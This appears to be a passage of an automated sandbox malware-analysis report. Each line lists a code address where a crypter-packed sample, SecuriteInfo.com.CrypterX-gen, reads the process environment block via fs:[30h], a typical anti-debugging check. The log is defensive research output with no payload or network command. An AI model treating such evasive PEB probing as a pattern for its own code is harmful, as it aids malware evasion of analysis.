Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016DE5E7 mov eax, dword ptr fs:[00000030h] 5_2_016DE5E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016DE5E7 mov eax, dword ptr fs:[00000030h] 5_2_016DE5E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016DE5E7 mov eax, dword ptr fs:[00000030h] 5_2_016DE5E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016DE5E7 mov eax, dword ptr fs:[00000030h] 5_2_016DE5E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016DE5E7 mov eax, dword ptr fs:[00000030h] 5_2_016DE5E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016DE5E7 mov eax, dword ptr fs:[00000030h] 5_2_016DE5E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B25E0 mov eax, dword ptr fs:[00000030h] 5_2_016B25E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EE5CF mov eax, dword ptr fs:[00000030h] 5_2_016EE5CF
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EE5CF mov eax, dword ptr fs:[00000030h] 5_2_016EE5CF
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B65D0 mov eax, dword ptr fs:[00000030h] 5_2_016B65D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EA5D0 mov eax, dword ptr fs:[00000030h] 5_2_016EA5D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EA5D0 mov eax, dword ptr fs:[00000030h] 5_2_016EA5D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017305A7 mov eax, dword ptr fs:[00000030h] 5_2_017305A7
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017305A7 mov eax, dword ptr fs:[00000030h] 5_2_017305A7
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017305A7 mov eax, dword ptr fs:[00000030h] 5_2_017305A7
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016D45B1 mov eax, dword ptr fs:[00000030h] 5_2_016D45B1
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016D45B1 mov eax, dword ptr fs:[00000030h] 5_2_016D45B1
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E4588 mov eax, dword ptr fs:[00000030h] 5_2_016E4588
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B2582 mov eax, dword ptr fs:[00000030h] 5_2_016B2582
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B2582 mov ecx, dword ptr fs:[00000030h] 5_2_016B2582
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EE59C mov eax, dword ptr fs:[00000030h] 5_2_016EE59C
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0173C460 mov ecx, dword ptr fs:[00000030h] 5_2_0173C460
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016DA470 mov eax, dword ptr fs:[00000030h] 5_2_016DA470
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016DA470 mov eax, dword ptr fs:[00000030h] 5_2_016DA470
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016DA470 mov eax, dword ptr fs:[00000030h] 5_2_016DA470
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0176A456 mov eax, dword ptr fs:[00000030h] 5_2_0176A456
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EE443 mov eax, dword ptr fs:[00000030h] 5_2_016EE443
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EE443 mov eax, dword ptr fs:[00000030h] 5_2_016EE443
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EE443 mov eax, dword ptr fs:[00000030h] 5_2_016EE443
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EE443 mov eax, dword ptr fs:[00000030h] 5_2_016EE443
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EE443 mov eax, dword ptr fs:[00000030h] 5_2_016EE443
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EE443 mov eax, dword ptr fs:[00000030h] 5_2_016EE443
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EE443 mov eax, dword ptr fs:[00000030h] 5_2_016EE443
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EE443 mov eax, dword ptr fs:[00000030h] 5_2_016EE443
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016A645D mov eax, dword ptr fs:[00000030h] 5_2_016A645D
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016D245A mov eax, dword ptr fs:[00000030h] 5_2_016D245A
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016AE420 mov eax, dword ptr fs:[00000030h] 5_2_016AE420
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016AE420 mov eax, dword ptr fs:[00000030h] 5_2_016AE420
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016AE420 mov eax, dword ptr fs:[00000030h] 5_2_016AE420
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016AC427 mov eax, dword ptr fs:[00000030h] 5_2_016AC427
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01736420 mov eax, dword ptr fs:[00000030h] 5_2_01736420
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01736420 mov eax, dword ptr fs:[00000030h] 5_2_01736420
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01736420 mov eax, dword ptr fs:[00000030h] 5_2_01736420
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01736420 mov eax, dword ptr fs:[00000030h] 5_2_01736420
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01736420 mov eax, dword ptr fs:[00000030h] 5_2_01736420
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01736420 mov eax, dword ptr fs:[00000030h] 5_2_01736420
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01736420 mov eax, dword ptr fs:[00000030h] 5_2_01736420
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E8402 mov eax, dword ptr fs:[00000030h] 5_2_016E8402
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E8402 mov eax, dword ptr fs:[00000030h] 5_2_016E8402
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E8402 mov eax, dword ptr fs:[00000030h] 5_2_016E8402
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B04E5 mov ecx, dword ptr fs:[00000030h] 5_2_016B04E5
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B64AB mov eax, dword ptr fs:[00000030h] 5_2_016B64AB
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0173A4B0 mov eax, dword ptr fs:[00000030h] 5_2_0173A4B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E44B0 mov ecx, dword ptr fs:[00000030h] 5_2_016E44B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0176A49A mov eax, dword ptr fs:[00000030h] 5_2_0176A49A
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B8770 mov eax, dword ptr fs:[00000030h] 5_2_016B8770
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C0770 mov eax, dword ptr fs:[00000030h] 5_2_016C0770
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C0770 mov eax, dword ptr fs:[00000030h] 5_2_016C0770
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C0770 mov eax, dword ptr fs:[00000030h] 5_2_016C0770
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C0770 mov eax, dword ptr fs:[00000030h] 5_2_016C0770
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C0770 mov eax, dword ptr fs:[00000030h] 5_2_016C0770
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C0770 mov eax, dword ptr fs:[00000030h] 5_2_016C0770
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C0770 mov eax, dword ptr fs:[00000030h] 5_2_016C0770
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C0770 mov eax, dword ptr fs:[00000030h] 5_2_016C0770
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C0770 mov eax, dword ptr fs:[00000030h] 5_2_016C0770
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C0770 mov eax, dword ptr fs:[00000030h] 5_2_016C0770
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C0770 mov eax, dword ptr fs:[00000030h] 5_2_016C0770
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C0770 mov eax, dword ptr fs:[00000030h] 5_2_016C0770
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E674D mov esi, dword ptr fs:[00000030h] 5_2_016E674D
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E674D mov eax, dword ptr fs:[00000030h] 5_2_016E674D
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E674D mov eax, dword ptr fs:[00000030h] 5_2_016E674D
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0173E75D mov eax, dword ptr fs:[00000030h] 5_2_0173E75D
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B0750 mov eax, dword ptr fs:[00000030h] 5_2_016B0750
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2750 mov eax, dword ptr fs:[00000030h] 5_2_016F2750
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2750 mov eax, dword ptr fs:[00000030h] 5_2_016F2750
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0172C730 mov eax, dword ptr fs:[00000030h] 5_2_0172C730
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EC720 mov eax, dword ptr fs:[00000030h] 5_2_016EC720
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EC720 mov eax, dword ptr fs:[00000030h] 5_2_016EC720
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E273C mov eax, dword ptr fs:[00000030h] 5_2_016E273C
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E273C mov ecx, dword ptr fs:[00000030h] 5_2_016E273C
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E273C mov eax, dword ptr fs:[00000030h] 5_2_016E273C
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EC700 mov eax, dword ptr fs:[00000030h] 5_2_016EC700
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B0710 mov eax, dword ptr fs:[00000030h] 5_2_016B0710
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E0710 mov eax, dword ptr fs:[00000030h] 5_2_016E0710
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016D27ED mov eax, dword ptr fs:[00000030h] 5_2_016D27ED
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016D27ED mov eax, dword ptr fs:[00000030h] 5_2_016D27ED
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016D27ED mov eax, dword ptr fs:[00000030h] 5_2_016D27ED
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B47FB mov eax, dword ptr fs:[00000030h] 5_2_016B47FB
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B47FB mov eax, dword ptr fs:[00000030h] 5_2_016B47FB
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0173E7E1 mov eax, dword ptr fs:[00000030h] 5_2_0173E7E1
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BC7C0 mov eax, dword ptr fs:[00000030h] 5_2_016BC7C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017307C3 mov eax, dword ptr fs:[00000030h] 5_2_017307C3
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B07AF mov eax, dword ptr fs:[00000030h] 5_2_016B07AF
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017647A0 mov eax, dword ptr fs:[00000030h] 5_2_017647A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0175678E mov eax, dword ptr fs:[00000030h] 5_2_0175678E
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EA660 mov eax, dword ptr fs:[00000030h] 5_2_016EA660
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EA660 mov eax, dword ptr fs:[00000030h] 5_2_016EA660
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0177866E mov eax, dword ptr fs:[00000030h] 5_2_0177866E
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0177866E mov eax, dword ptr fs:[00000030h] 5_2_0177866E
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E2674 mov eax, dword ptr fs:[00000030h] 5_2_016E2674
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016CC640 mov eax, dword ptr fs:[00000030h] 5_2_016CC640
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B262C mov eax, dword ptr fs:[00000030h] 5_2_016B262C
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016CE627 mov eax, dword ptr fs:[00000030h] 5_2_016CE627
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E6620 mov eax, dword ptr fs:[00000030h] 5_2_016E6620
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E8620 mov eax, dword ptr fs:[00000030h] 5_2_016E8620
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C260B mov eax, dword ptr fs:[00000030h] 5_2_016C260B
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C260B mov eax, dword ptr fs:[00000030h] 5_2_016C260B
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C260B mov eax, dword ptr fs:[00000030h] 5_2_016C260B
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C260B mov eax, dword ptr fs:[00000030h] 5_2_016C260B
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C260B mov eax, dword ptr fs:[00000030h] 5_2_016C260B
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C260B mov eax, dword ptr fs:[00000030h] 5_2_016C260B
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C260B mov eax, dword ptr fs:[00000030h] 5_2_016C260B
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2619 mov eax, dword ptr fs:[00000030h] 5_2_016F2619
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0172E609 mov eax, dword ptr fs:[00000030h] 5_2_0172E609
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0172E6F2 mov eax, dword ptr fs:[00000030h] 5_2_0172E6F2
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0172E6F2 mov eax, dword ptr fs:[00000030h] 5_2_0172E6F2
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0172E6F2 mov eax, dword ptr fs:[00000030h] 5_2_0172E6F2
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0172E6F2 mov eax, dword ptr fs:[00000030h] 5_2_0172E6F2
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017306F1 mov eax, dword ptr fs:[00000030h] 5_2_017306F1
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017306F1 mov eax, dword ptr fs:[00000030h] 5_2_017306F1
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EA6C7 mov ebx, dword ptr fs:[00000030h] 5_2_016EA6C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EA6C7 mov eax, dword ptr fs:[00000030h] 5_2_016EA6C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EC6A6 mov eax, dword ptr fs:[00000030h] 5_2_016EC6A6
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E66B0 mov eax, dword ptr fs:[00000030h] 5_2_016E66B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B4690 mov eax, dword ptr fs:[00000030h] 5_2_016B4690
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B4690 mov eax, dword ptr fs:[00000030h] 5_2_016B4690
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01754978 mov eax, dword ptr fs:[00000030h] 5_2_01754978
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01754978 mov eax, dword ptr fs:[00000030h] 5_2_01754978
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016D6962 mov eax, dword ptr fs:[00000030h] 5_2_016D6962
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016D6962 mov eax, dword ptr fs:[00000030h] 5_2_016D6962
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016D6962 mov eax, dword ptr fs:[00000030h] 5_2_016D6962
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0173C97C mov eax, dword ptr fs:[00000030h] 5_2_0173C97C
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01730946 mov eax, dword ptr fs:[00000030h] 5_2_01730946
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01784940 mov eax, dword ptr fs:[00000030h] 5_2_01784940
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0173892A mov eax, dword ptr fs:[00000030h] 5_2_0173892A
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0174892B mov eax, dword ptr fs:[00000030h] 5_2_0174892B
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0173C912 mov eax, dword ptr fs:[00000030h] 5_2_0173C912
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016A8918 mov eax, dword ptr fs:[00000030h] 5_2_016A8918
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016A8918 mov eax, dword ptr fs:[00000030h] 5_2_016A8918
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0172E908 mov eax, dword ptr fs:[00000030h] 5_2_0172E908
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0172E908 mov eax, dword ptr fs:[00000030h] 5_2_0172E908
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0173E9E0 mov eax, dword ptr fs:[00000030h] 5_2_0173E9E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E29F9 mov eax, dword ptr fs:[00000030h] 5_2_016E29F9
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E29F9 mov eax, dword ptr fs:[00000030h] 5_2_016E29F9
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0177A9D3 mov eax, dword ptr fs:[00000030h] 5_2_0177A9D3
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017469C0 mov eax, dword ptr fs:[00000030h] 5_2_017469C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BA9D0 mov eax, dword ptr fs:[00000030h] 5_2_016BA9D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BA9D0 mov eax, dword ptr fs:[00000030h] 5_2_016BA9D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BA9D0 mov eax, dword ptr fs:[00000030h] 5_2_016BA9D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BA9D0 mov eax, dword ptr fs:[00000030h] 5_2_016BA9D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BA9D0 mov eax, dword ptr fs:[00000030h] 5_2_016BA9D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BA9D0 mov eax, dword ptr fs:[00000030h] 5_2_016BA9D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E49D0 mov eax, dword ptr fs:[00000030h] 5_2_016E49D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017389B3 mov esi, dword ptr fs:[00000030h] 5_2_017389B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017389B3 mov eax, dword ptr fs:[00000030h] 5_2_017389B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017389B3 mov eax, dword ptr fs:[00000030h] 5_2_017389B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B09AD mov eax, dword ptr fs:[00000030h] 5_2_016B09AD
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B09AD mov eax, dword ptr fs:[00000030h] 5_2_016B09AD
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C29A0 mov eax, dword ptr fs:[00000030h] 5_2_016C29A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C29A0 mov eax, dword ptr fs:[00000030h] 5_2_016C29A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C29A0 mov eax, dword ptr fs:[00000030h] 5_2_016C29A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C29A0 mov eax, dword ptr fs:[00000030h] 5_2_016C29A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C29A0 mov eax, dword ptr fs:[00000030h] 5_2_016C29A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C29A0 mov eax, dword ptr fs:[00000030h] 5_2_016C29A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C29A0 mov eax, dword ptr fs:[00000030h] 5_2_016C29A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C29A0 mov eax, dword ptr fs:[00000030h] 5_2_016C29A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C29A0 mov eax, dword ptr fs:[00000030h] 5_2_016C29A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C29A0 mov eax, dword ptr fs:[00000030h] 5_2_016C29A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C29A0 mov eax, dword ptr fs:[00000030h] 5_2_016C29A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C29A0 mov eax, dword ptr fs:[00000030h] 5_2_016C29A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C29A0 mov eax, dword ptr fs:[00000030h] 5_2_016C29A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0173E872 mov eax, dword ptr fs:[00000030h] 5_2_0173E872
